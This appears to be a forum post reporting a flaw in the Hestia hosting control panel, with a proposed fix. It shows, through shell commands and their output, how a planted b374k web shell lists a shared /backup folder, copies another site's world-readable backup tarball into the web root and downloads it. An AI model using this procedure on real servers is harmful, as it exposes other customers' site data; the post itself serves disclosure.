Hi everybody,
long time I testing the hestia and to now I found one very important(for me) bug.
If you upload a shell (b374k) on someone domain for this example: example.blog;
And you go to the web shell: example.blog/webshell_b374k.php and you use the command line:
pwd
/home/example/web/example.blog/public_html
ls -al
total 48956
drwxr-x--x 5 exampleuser www-data 4096 Dec 30 21:47 .
drwxr-x--x 8 exampleuser exampleuser 4096 Dec 30 16:43 ..
-rw-r--r-- 1 exampleuser exampleuser 99552 Mar 12 2021 webshell_b374k.php
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 21 21:22 css
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 30 17:58 images
-rw-r--r-- 1 exampleuser exampleuser 22324 Dec 30 18:16 index.php
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 21 21:22 js
ls -al /backup
you see all backups for all websites.
total 58556
drwxr-xr-x 2 root root 4096 Dec 30 21:30 .
drwxr-xr-x 19 root root 4096 Oct 30 11:58 ..
-rw-r----- 1 admin test2 174080 Dec 30 05:10 test2.2021-12-30_05-10-12.tar
-rw-rw---- 1 root root 1108 Dec 30 05:10 test2.log
-rw-r----- 1 admin 1007 153600 Dec 27 05:10 zzzzzzzz.2021-12-27_05-10-15.tar
-rw-rw---- 1 root root 1093 Dec 27 05:10 zzzzzzzz.log
-rw-rw---- 1 root root 990 Dec 30 05:10 admin.log
-rw-r----- 1 admin gree 92160 Dec 30 05:10 gree.2021-12-30_05-10-05.tar
-rw-rw---- 1 root root 1100 Dec 30 05:10 gree.log
-rw-r----- 1 admin test1 8878080 Dec 30 05:10 test1.2021-12-30_05-10-14.tar
-rw-rw---- 1 root root 1087 Dec 30 05:10 test1.log
-rw-r--r-- 1 root root 49981440 Dec 30 21:21 zzzzzzzz1.2021-12-30_21-25-04.tar
-rw-rw---- 1 root root 1116 Dec 30 21:25 zzzzzzzz1.log
-rw-r----- 1 admin test3 245760 Dec 30 05:10 test3.2021-12-30_05-10-13.tar
-rw-rw---- 1 root root 1147 Dec 30 05:10 test3.log
-rw-r----- 1 admin test4 133120 Dec 30 05:10 test4.2021-12-30_05-10-15.tar
-rw-rw---- 1 root root 1059 Dec 30 05:10 test4.log
-rw-r----- 1 admin test5 235520 Dec 30 05:10 test5.2021-12-30_05-10-04.tar
-rw-rw---- 1 root root 1125 Dec 30 05:10 test5.log
-rw-rw---- 1 root root 1234 Dec 30 05:10 zzzzzzzz3.log
And after this:
`cp /backup/zzzzzzzz.2021-12-27_05-10-15.tarr zzzzzzzz.2021-12-27_05-10-15.tar
total 48956
drwxr-x–x 5 exampleuser www-data 4096 Dec 30 21:47 .
drwxr-x–x 8 exampleuser exampleuser 4096 Dec 30 16:43 …
-rw-r–r-- 1 exampleuser exampleuser 99552 Mar 12 2021 webshell_b374k.php
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 21 21:22 css
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 30 17:58 images
-rw-r–r-- 1 exampleuser exampleuser 22324 Dec 30 18:16 index.php
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 21 21:22 js
-rw-r–r-- 1 exampleuser exampleuser 49981440 Dec 30 21:47 zzzzzzzz.2021-12-27_05-10-15.tarr
After this:
example.com/zzzzzzzz.2021-12-27_05-10-15.tar
And you can the download the backups is very easy.
As a correction, I think it is right to store backup files in the user directory:
/ home / USER / backups
And this backup can be with the option for automatic or manual at the request of the user in hestia.
The problem is that not every time the backup file has a group created (I have no idea why)
=======
I did an experiment by creating the archive manually via hestia web and he created the archive with the necessary chown rights
user:group
This is certainly not the problem.
There is probably some automatic backup that is done sometimes and it does not add a group to the backup file and it is vulnerable. When I analyze more things I will write more on the topic.